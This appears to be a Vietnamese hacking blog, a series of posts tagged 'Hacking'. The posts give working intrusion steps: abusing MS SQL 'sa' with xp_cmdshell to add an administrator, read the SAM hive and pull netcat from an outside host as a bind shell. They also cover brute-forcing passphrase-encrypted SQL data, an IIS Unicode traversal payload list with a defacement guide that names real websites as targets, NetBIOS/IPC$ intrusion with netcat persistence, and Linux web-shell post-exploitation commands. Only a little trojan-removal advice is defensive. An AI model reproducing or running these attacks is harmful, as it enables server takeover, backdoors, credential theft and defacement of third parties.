xp_regaddmultistring – adds a multistring (zero-delimited string)
xp_regremovemultistring – removes a multi string (zero delimited string)

Nhiệm vụ chính của chúng ta hiện giờ là , add ADMIN , đổ SAM và UPLOAD Backdoor .

Thêm tài khoản vào Administrators Group : ( username : Mask_NBTA , password : hacked )

Xp_cmdshell ‘net user Mask_NBTA hacked /ADD’
Xp_cmdshell ‘net localgroup /ADD Administrators Mask_NBTA’

Đổ SAM :
Có quyền admin thì đọc file SAM và Crack bằng L0pth Crack 4.0 : ( máy tôi pentium 4 1.7 Ghz crack 2 user mất khoảng 7h )
Xp_regread ‘HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account ‘,’F’
Tại sao thông qua “sa” ta có thể làm nhiều việc như vậy , tại vì mặc định SQL Server chạy với quyền “local system”

UPLOAD Backdoor :
Các bạn có thể dùng backdoor gì tuỳ thích , ở đây tôi dùng netcat ( xưa giờ vẫn ko thấy con nào hay hơn con này ) :
xp_cmdshell ‘tftp –I nasty.com GET nc.exe c:\nc.exe’
và thi hành nó bằng cách :
xp_cmdshell ‘c:\nc.exe –l –p 8000 –e cmd.exe’
Sau đó vào DOS , telnet vào server ở PORT 8000
Xong , với 3 công việc này bạn đã biết phải làm gì khi có được “sa” ở MS SQL Server .
Àh , nếu bạn nào vô tình bằng cách gì đó có được password HASH của “sa” thì tôi xin giới thiệu 1 cách để crack password này rất hiệu quả .
Hướng dẫn cặn kẽ và có tool sãn ở đây : http://www.ngssoftware.com/ tìm file cracking-sql-passwords.pdf
Lưu ý : các kiến thức trên chỉ là để học hỏi , các bạn không nên dùng nó để phá hoại .

Categories: Hacking Thẻ:

Hack dữ liệu SQL Server 2005 đã mã hoá bởi mật khẩu

Tháng Mười 7, 2008 Để lại phản hồi

Như
bạn đã biết, mã hoá bằng mật khẩu là một phương pháp mã hoá dữ liệu cơ
bản chỉ sử dụng đến mật khẩu và có thể giải mã với cùng mật khẩu đó.
Giờ hãy giả dụ chúng ta quên mất mật khẩu đã đặt và cần phải khôi phục
lại dữ liệu như ban đầu.

Như bạn đã biết, mã hoá bằng
mật khẩu là một phương pháp mã hoá dữ liệu cơ bản chỉ sử dụng đến mật
khẩu và có thể giải mã với cùng mật khẩu đó. Giờ hãy giả dụ chúng ta
quên mất mật khẩu đã đặt và cần phải khôi phục lại dữ liệu như ban đầu.

Bước 1

Mã hoá dữ liệu theo phương pháp mã hoá bằng mật khẩu

select EncryptedData = EncryptByPassPhrase(’MAK’, ‘123456789′ )

Kết quả

EncryptedData
————————————————————————–
0×01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC

Bước 2

Tạo thủ tục sử dụng để khôi phục lại dữ liệu đã má hoá. Thủ tục này
sẽ sử dụng hàm DecryptByPassPhrase để giải mã dữ liệu và hiển thị lên
mật khẩu.

USE [Master]
GO

/****** Object: StoredProcedure [dbo].[hack_encryption] Script Date: 12/18/2007 18:18:36 ******/
IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N’[dbo].[hack_encryption]‘)
AND type in (N’P’, N’PC’))
DROP PROCEDURE [dbo].[hack_encryption]
GO
set nocount on
SET CONCAT_NULL_YIELDS_NULL OFF
go
USE [Master]
GO

/****** Object: StoredProcedure [dbo].[hack_encryption] Script Date: 12/18/2007 18:18:55 ******/
SET ANSI_NULLS ON
GO

SET QUOTED_IDENTIFIER ON
GO

CREATE procedure [dbo].[hack_encryption] @encryptedtext varbinary(max)
as
declare @password varchar(6)
declare @i int
declare @j int
declare @k int
declare @l int
declare @m int
declare @n int

set @i=-1
set @j=-1
set @k=-1
set @l=-1
set @m=-1
set @n=-1
set @password =”

while @i<255
begin
while @j<255
begin
while @k<255
begin
while @l<255
begin
while @m<255
begin
while @n<=255
begin
set @password=isnull(char(@i),”)
+ isnull(char(@j),”)
+isnull(char(@k),”)+ isnull(char(@l),”)
+isnull(char(@m),”) + isnull(char(@n),”)
if convert(varchar(100), DecryptByPassPhrase(ltrim(rtrim(@password)),
@encryptedtext)) is not null
begin
print ‘This is the Encrypted text:’ +@password
set @i=256;set @j=256;set @k=256;set @l=256;set @m=256;set @n=256;
print ‘The actual data is :’ +convert(varchar(100),
DecryptByPassPhrase(ltrim(rtrim(@password)), @encryptedtext))
end
–print ‘A’+ltrim(rtrim(@password))+’B’
–print convert(varchar(100), DecryptByPassPhrase(ltrim(rtrim(@password)),@encryptedtext))
set @n=@n+1
end
set @n=0
set @m=@m+1
end
set @m=0
set @l=@l+1
end
set @l=0
set @k=@k+1
end
set @k=0
set @j=@j+1
end
set @j=0
set @i=@i+1
end

GO

Bước 3

Giả sử rằng bạn đã quên mật khẩu dùng để mã hoá dữ liệu thành “0×01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC”. Chúng ta có thể truy tìm lại được mật khẩu và dữ liệu đã bị mã hoá bằng thủ tục sau

use master
go
select getdate() as StartingTime
go
declare @myencryptedtext varbinary(max)
set @myencryptedtext=0×01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC
print @myencryptedtext
exec hack_encryption @encryptedtext=@myencryptedtext
go
select getdate() as EndingTime
go

Kết quả

StartingTime
———————–
2007-12-18 18:24:10.843

0×01000000F75D553409C74570F6DDBCADA53FD489DDD52D9277010050565ADF30F244F8CC
This is the Encrypted text: MAK
The actual data is :123456789

EndingTime
———————–
2007-12-18 18:26:36.080

Như bạn thấy trong kết quả (hình 1), nó chỉ cần đển
2 phút để tìm lại được dữ liệu và mật khẩu. Về cơ bản, thủ tục này lặp
lại tất cả khả năng hợp lý có thể xảy ra của các ký tự ASCII có độ dài
trên 6 ký tự để tìm ra mật khẩu và sử dụng nó để giải mã dữ liệu.

Tạo ra một thủ tục sẽ không giúp gì nhiều khi dữ liệu đã được mã hoá
nằm trong một bảng. Vì vậy chúng ta phải thay đổi thủ thục này thành
một hàm vô hướng như hướng dẫn dưới đây

Bước 1

Tạo thủ tục như sau

USE [master]
GO

/****** Object: UserDefinedFunction [dbo].[hack_encryption_password] Script Date: 12/18/2007 18:36:29 ******/
IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N’[dbo].[hack_encryption_password]‘)
AND type in (N’FN’, N’IF’, N’TF’, N’FS’, N’FT’))
DROP FUNCTION [dbo].[hack_encryption_password]
GO
use [Master]
go

CREATE function [dbo].[hack_encryption_password] (@encryptedtext varbinary(max))
returns varchar(6)
with execute as caller
as
begin
declare @password varchar(6)
declare @i int
declare @j int
declare @k int
declare @l int
declare @m int
declare @n int

set @i=-1
set @j=-1
set @k=-1
set @l=-1
set @m=-1
set @n=-1
set @password =”

while @i<255
begin
while @j<255
begin
while @k<255
begin
while @l<255
begin
while @m<255
begin
while @n<=255
begin
set @password=isnull(char(@i),”) + isnull(char(@j),”)
+isnull(char(@k),”)+ isnull(char(@l),”)
+isnull(char(@m),”) + isnull(char(@n),”)
if convert(varchar(100), DecryptByPassPhrase(ltrim(rtrim(@password)),
@encryptedtext)) is not null
begin
–print ‘This is the Encrypted text:’ +@password
set @i=256;set @j=256;set @k=256;set @l=256;set @m=256;set @n=256;
–print ‘The actual data is :’ +convert(varchar(100),
DecryptByPassPhrase(ltrim(rtrim(@password)),@encryptedtext))
end
–print ‘A’+ltrim(rtrim(@password))+’B’
–print convert(varchar(100),DecryptByPassPhrase(ltrim(rtrim(@password)),@encryptedtext))
set @n=@n+1
end
set @n=0
set @m=@m+1
end
set @m=0
set @l=@l+1
end
set @l=0
set @k=@k+1
end
set @k=0
set @j=@j+1
end
set @j=0
set @i=@i+1
end

return @password
END

Bước 2

Tạo một bảng với dữ liệu được mã hoá

USE [tempdb]
GO
/****** Object: Table [dbo].[MyTable] Script Date: 12/18/2007 18:44:40 ******/
IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N’[dbo].[MyTable]‘) AND type in (N’U’))
DROP TABLE [dbo].[MyTable]
GO
create table MyTable(id int, encrypteddata varbinary(max))
go
insert into MyTable select 1, EncryptByPassPhrase(’Do’, ‘1112228333′)
insert into MyTable select 2, EncryptByPassPhrase(’Re’, ‘1212223833′)
insert into MyTable select 3, EncryptByPassPhrase(’Me’, ‘1132223393′)
insert into MyTable select 4, EncryptByPassPhrase(’Fa’, ‘1114223383′)
insert into MyTable select 5, EncryptByPassPhrase(’So’, ‘1112523333′)
insert into MyTable select 6, EncryptByPassPhrase(’La’, ‘1112263373′)
insert into MyTable select 7, EncryptByPassPhrase(’Si’, ‘1112227338′)
go

Bước 3

Truy vấn dữ liệu sử dụng câu lệnh SQL sau

Select * from MyTable

Bạn sẽ thấy dữ liệu hiển thị như sau (hình 2)

1 0×01000000D8ED1498BEA4023D541C6EA9766A6B7B0585FAE91B942C88C23677550C6FD7FA
2 0×01000000F0725A52501A41D125F049011BE87C5C4A42263E7538B837B8278ADEE5FC2678
3 0×01000000C8804D8516B944B0AE35C71F79130DA415CED5CCF58E522692AC749115EEF0D9
4 0×010000007A91A24638C0E0354336AE5682805312CCB0B1E6BBACB6D9E65DC5D9DA73906E
5 0×010000008FB6BDD91C3D1A8C94FAF647DE1F931CEE5104045BD03DE4E809565E74604DF3
6 0×01000000C3A41428A21EDE8D8579AF9C42132678448A9113A31A869276A7631A58A32BE3
7 0×01000000BD829E12D3EAAF96BB66930301BA1D9CD3748946F354301922A03AE49047FE00

Bước 4

Sử dụng hàm hack_encryption_password để khôi phục tất cả các mật khẩu từ dưc liệu đã được mã hoá trong bảng MyTable. Thực thi câu lệnh SQL sau

select ID ,master.[dbo].[hack_encryption_password] (encrypteddata) as Password from MyTable

Bạn sẽ thấy kết quả như sau (Hình 3)

1 Do
2 Re
3 Me
4 Fa
5 So
6 La
7 Si

Hàm trên có thê được chỉnh sửa để trả về cả dữ liệu đã được mã hoá, thực hiện như sau

Bước 1

Tạo hàm sau

USE [master]
GO

/****** Object: UserDefinedFunction [dbo].[hack_encryption_password] Script Date: 12/18/2007 18:36:29 ******/
IF EXISTS (SELECT * FROM sys.objects WHERE object_id = OBJECT_ID(N’[dbo].[hack_encryption_data]‘)
AND type in (N’FN’, N’IF’, N’TF’, N’FS’, N’FT’))
DROP FUNCTION [dbo].[hack_encryption_data]
GO
use [Master]
go

CREATE function [dbo].[hack_encryption_data] (@encryptedtext varbinary(max))
returns varchar(8000)
with execute as caller
as
begin
declare @data varchar(8000)
declare @password varchar(6)
declare @i int
declare @j int
declare @k int
declare @l int
declare @m int
declare @n int

set @i=-1
set @j=-1
set @k=-1
set @l=-1
set @m=-1
set @n=-1
set @password =”

while @i<255
begin
while @j<255
begin
while @k<255
begin
while @l<255
begin
while @m<255
begin
while @n<=255
begin
set @password=isnull(char(@i),”) + isnull(char(@j),”)+isnull(char(@k),”)
+ isnull(char(@l),”)+isnull(char(@m),”) + isnull(char(@n),”)
if convert(varchar(100),DecryptByPassPhrase(ltrim(rtrim(@password)),
@encryptedtext)) is not null
begin
–print ‘This is the Encrypted text:’ +@password
set @i=256;set @j=256;set @k=256;set @l=256;set @m=256;set @n=256;
set @data = convert(varchar(100), DecryptByPassPhrase(ltrim(rtrim(@password)),@encryptedtext))
end
–print ‘A’+ltrim(rtrim(@password))+’B’
–print convert(varchar(100), DecryptByPassPhrase(ltrim(rtrim(@password)),@encryptedtext))
set @n=@n+1
end
set @n=0
set @m=@m+1
end
set @m=0
set @l=@l+1
end
set @l=0
set @k=@k+1
end
set @k=0
set @j=@j+1
end
set @j=0
set @i=@i+1
end

return @data
END

Bước 2

Giải mã dữ liệu sử dụng hàm đã tạo

select ID ,master.[dbo].[hack_encryption_data] (encrypteddata) as Password from MyTable

Kết quả như hình 4

Lưu ý:

  • Thủ thục và các hàm chỉ có thể hack đối với mật khẩu dài 6 ký tự.
  • Thủ tục và hàm này có thể chiếm rất nhiều CPU để lấy lại dữ liệu và tìm lại mật khẩu
Categories: Hacking Thẻ:

Ky thuat hack vao IIS Server

Tháng Năm 27, 2008 Để lại phản hồi

Chao anh em! Hom nay toi lai tiep tuc gioi thieu voi anh em mot ky thuat hack vao IIS Server nua. Tai lieu nay khong phai cua em, ma em chi di “hoc lom” duoc tren Internet va da thuc hanh roi. Thay hay hay len muon cung anh em trao doi.

Buoc 1:
Anh em can mot file Unicode duoi dang Perl (*.pl) va mot chuong trinh Perl.

Buoc 2:
Sau khi da chuan bi xong. Anh em ra DOS go:
perl unicode.pl
Se thay Host: (go dia chi Website ma anh em muon xac dinh xem co phai la IIS khong)
Port: Go 80.
…..
Cho mot chut neu la IIS no se tim cac Bug tren IIS. Trong file Unicode.pl co chua khoang 20 Bug.

Trích dẫn:

1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Buoc 3:
Anh em mo Browser go dia chi trang Web va copy phan bug ma Unicode phat hien vao.

VD: Toi go
perl unicode.pl
Host: http://www.tnh.com.vn
Port: 80

Sau khi no Scan thi thay cai Host nay co 2 Bug 14 va 18. Toi co the su dung mot trong 2 bug nay. Chang han toi su dung Bug 18.
Toi mo Browser, trong thanh Add toi go:

http://www.tnh.com.vn/_vti_bin/..%c0…32/cmd.exe?/c+

Vay la ban da dot nhap duoc vao IIS roi day. Cac ban co the truy cap vao o cung cua IIS nhu la o cung cua minh vay. Cac ban co the tao, xoa, di chuyen, thu muc, file, up, down va run cac file tren Server do…Muon vay cac ban chi can dung cac lenh cua DOS thoi. Dung noi voi toi la cac ban khong biet lenh Dos nha.

VD: De doc o C—-Cac ban go dir+c:\—-Tuong ung voi dong lenh o Browser.

http://www.tnh.com.vn/_vti_bin/..%c0…exe?/c+dir+c:\

Tuong tu co cac lenh nhu: md, rd, ren…Cu ngam lai sach DOS la OK het a.

P/S: Thong thuong trang Web thuong o inetpub\wwwroot

Anh em chi can dzo day thay File index.html cua no bang index.html cua minh. Vay la OK! Website do bi hack roi day. Nho dung cac chuong trinh de che dau IP cho an toan nha. Khong la boc lich nhu choi day. Duoi day la mot so Website dung IIS

http://www.psv.com.vn/

http://www.tnh.com.vn/

http://www.mekonggreen.com.vn

http://www.thaiweb.co.th/

http://www.khaitri.com.vn/

Luu y: Em khong chiu bat cu trach nhiem nao do anh em su dung no gay ra

Categories: Hacking Thẻ:

Hack vào PC sử dụng HĐH windows

Tháng Năm 27, 2008 1 comment

Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha). Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.
Vậy hacker làm như thế nào để Hack?

Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:

Trích dẫn:

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )Shared resources at \\x.x.x.xShare name Type Used as Comment
——————————————————————————-
C Disk
PRJA3 Disk
The command completed successfully.
C:\>

Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:

Trích dẫn:

C:\> net use z: \\x.x.x.x \share
The command completed successfully.

Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :

Trích dẫn:

C:\> Nbtstat –A x.x.x.xNetBIOS Remote Machine Name TableName Type Status
———————————————
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP RegisteredMAC Address = 00-08-A1-5B-E3-8C

Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt

Trích dẫn:

“” ADMIN
123456 ADMIN
123456 BODY
“” BODY

Sau đó hacker crack bang lệnh :
Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:

Trích dẫn:

C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt

Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)

Trích dẫn:

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:

Trích dẫn:

C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:

Trích dẫn:

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng VNIT thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim

Trích dẫn:

C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

Trích dẫn:

C:\> sc \\x.x.x.x start schedule
service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

Trích dẫn:

C:\> net time \\x.x.x.xCurrent time at \\10.0.0.31 is 6/29/2005 4:50 AMThe command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

Trích dẫn:

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

Trích dẫn:

C:\>nc –nvv x.x.x.x 111(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. “moi” file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

Trích dẫn:

Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
“netcat”=”\”C:\\nc\\nc.exe\” -L -d -p111 -e cmd.exe”

Sau đó copy sang máy victim và chạy nha!
Hy vọng mọi người đừng phá hoại nha ! Thân

Nhân đây mình cũng đưa ra 1 số cách phòng chống troijan để giúp các bạn khi bị dính ấy mà hi:hi
Trong một thời gian dài trên Internet có thể máy bạn sẽ bị “dính” Trojan mà bạn không hề hay biết – một điều vô cùng nguy hiểm, mà bạn lại chẳng muốn thế tí nào. Để đề phòng bạn phải kiểm tra PC của bạn có nhiểm trojan hay không một cách thường xuyên.
Bạn có thể làm điều này bằng các chương trình Anti Virus và Anti Trojan ( Chẳng hạn như TFAK, AVP, TDS…) như kết quả hầu như luôn luôn bằng 0, vì các chương trình ấy không bao giờ tìm được bất cứ con trojan nào ( ngay cả 1 số chương trình được cập nhật hàng ngày). VNIT sẽ chỉ cho các bạn cách check PC của bạn.

+ Làm sao VNIT có thể biết PC của vnit đã bị nhiễm Trojan ?

Đầu tiên, các bạn phải check các cổng (port) của bạn. Điều này có thể thực hiện bởi một số chương trình như : Portcheck, Portscanning… hoặc bằng chương trình Netstat trong MS-Dos của Windows.
Các bạn mở MS-Dos Commandline ( trước đó các bạn phải offline caí đã) và đánh vào lệnh : netstat-a
Kế đó các bạn sẽ thấy một vài thứ tương tự như sau :

Active Connections

Proto Local Address Foreign Address State
TCP _:31337 0.0.0.0:45178 LISTENING
UDP _:31337 *:*

Hãy nhìn xem, kia là một chương trình được “nghe” thấy ở cổng 31337 một chương trình dành cho TCP-Connection. Đó là cách chạy đặc thù của các con trojan, chúng đợi một acttacker kết nối với chúng và gửi cho chúng các lệnh… Một người giàu kinh nghiệm có thể nhận biết các cổng mà trojan sử dụng. ( trong trường hợp trên 31337 = Backdoor Office)
Đối với những người chưa có kinh nghiệm, họ sẽ sử dụng những chương trình quét virus. Nhưng sẽ rất khó để tìm được sự tồn tại của trojan.

Sau đó bạn cần kiểm tra những chương trình đang chạy ( nhưng không phải với Windows Taskmanager – Alt + Ctrl + Del) bởi vì nó có thể tự che giấu mình khi kiểm tra bằng Windows Taskmanager. Tốt hơn là các bạn nên sử dụng một Taskmanager khác để thay thế, chẳng hạn như CCTASK. Các bạn nên khởi động lại máy (reboot) trước khi kiểm tra, vì chúng ta muốn nhìn thấy các chương trình được chạy khi Windows khởi động. Nếu bạn phát hiện ra một thứ gì đó đáng nghi, hãy save file đó ở một nơi đặc biệt và xóa nó đi.

Một vài khả năng khác ta có thể tìm thấy các con trojan kiểm soát các file system để nó có thể tự động chạy khi Windows khởi động.

Trong các file:

Autoexec.bat : file này kiểm soát các lệnh ‘del’ và ‘format’ và các lệnh trong Dos…, giúp cho các file có thể tự chạy khi khởi động Windows. (MS-Dos file)
Win.ini : file kiểm soát các lệnh như : ‘load=’ và ‘run=’ câu lệnh này sẽ giúp bạn chạy các file mà bạn cho đường dẫn đến.
System.ini :file này cho phép sử dụnh lệnh ‘shell=’ để gọi một chương trình khi khởi động PC.
Registry : có một vài khả năng để khởi động một file với sự trợ giúp cua Registry. Bạn có thể kiểm tra các chương trình bạn muốn bằng ‘Registry.exe’:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce

Nhưng ở đây lại có 3 mục khác:

HKEY_CLASSES_ROOT\exefile\shell\open\command
HKEY_CLASSES_ROOT\comfile\shell\open\command
HKEY_CLASSES_ROOT\batfile\shell\open\command
Trong các key này nếu thế vào bằng các đường dẫn đúng thì khi khởi động máy, các file ấy sẽ được chạy. Bạn phải thay đổi các thiết lập này để các con trojan không thể chạy được.

Chú ý, khi bạn thay đổi các thiết lập này, nếu bạn mắc bất cứ lỗi nào thì sau này bạn sẽ không thể khởi động được file đó.
Các mục mặc định thường là: “%1″ %*

Một vài biểu hiện để phát hiện ra Trojan:
+ Biểu hiện khác lạ của PC.
+Messageboxes với những nội dung kì quặc, đáng nghi.
+Xoá file.
+PC chạy chậm hơn.

+Làm sao để remove Trojan ?
Khi đã biết máy mình bị nhiễm trojan các bạn có thể làm theo các bước sau để remove nó:

1/ Kill chương trình với Taskmanager (rất quan trọng vì một số chương trình có khả năng tự khôi phục chức năng Auto Start).
2/Xóa bỏ chức năng Auto Start.
3/Save file ở một nơi khác và xoá nó đi.
4/Khởi dộng lại máy và check máy lại xem có Trojan không.
5/Nếu có lỗi, khôi phục lại file và khởi động lại máy.
6/Gửi con Trojan tới :
7/Thay đổi Password của bạn.
8/Nếu may mắn, TFAK sẽ sớm tìm ra con trojan này.

Nếu các bạn làm đúng theo các chỉ dẩn này thì các bạn sẽ phát hiện và remove được 99% tất cả các con trojan

Categories: Hacking Thẻ:

Lệnh để làm việc với Linux

Tháng Năm 27, 2008 Để lại phản hồi

Giả sử ta đang hack 1 trang web , sau khi include đc 1 con shell vào website ta có 1 shell lệnh để làm việc với Linux .
okie

Vậy đầu tiên ta sẽ phải làm gì , thực hiện những lệnh gì trên con shell của ta để lấy đc thông tin cần thiết , cũng như đảm bảo sự truy cập lâu dài của ta vào sv đó (tức là việc giữ shell) . Ta biết rằng càng rút ngắn đc time thì ta càng làm đc nhiều việc trên sv cũng như tránh đc sự phát hiện của ng quản lý nhất . Chúng ta sẽ bàn về những kinh nghiệm sau khi có đc shell trên 1 sv . okie .

Tôi xin mở đầu trước . Sau khi Include đc 1 con shell vào site , Safe-mod = Off , ta dùng những lệnh gì .

+Tìm ngay thư mục có quyền ghi để Upload 1 con shell “xịn” lên sv bởi vì con shell included của ta đôi khi làm việc ko ổn định. Trên dòng command line tôi gõ :

Trích dẫn:

find /home/victim/public_html/ -type d -perm -2 -ls

- tìm kiếm những thư mục & thư mục con có quyền writeable tính từ /home/victim/public_html/

Trích dẫn:

find /home/victim/public_html/ -type d -perm -2 -ls

- tìm kiếm những file ta có thể ghi đè lên tính từ /home/victim/public_html/

Ok, và lúc này Linux sẽ tự động tìm kiếm cho ta các thư mục & file có thể “chơi” đc … roài ta tiến hành Upload shell

+Tiếp theo , ta lấy thêm thông tin của sv để dùng khi cần đến , các lệnh ko thể ko biết đó là :

Trích dẫn:

cat /etc/passwd : xem File passwdcat /etc/domains : xem các domains trên sv

nếu sv sử dụng cPanelX thì còn đợi gì mà ko

Trích dẫn:

cat /var/cpanel/accounting.log : để xem các account trên sv , nó sẽ phơi bày hết domain name & username của từng account , từ đó ta có thể dễ dàng lần ra nó ở đâu (đỡ phải mất công mò mẫm)

bạn muốn tìm user có domain là victim.com thì dùng lệnh sau:

Trích dẫn:

cat /var/cpanel/accounting.log | grep “victim.com”

oke, biết vận dụng các lệnh linux là đc

Lấy mấy thông tin về sv khi cần

Trích dẫn:

về apache:
whereis apache
cat /usr/local/apache/conf/httpd.confvề log
whereis log
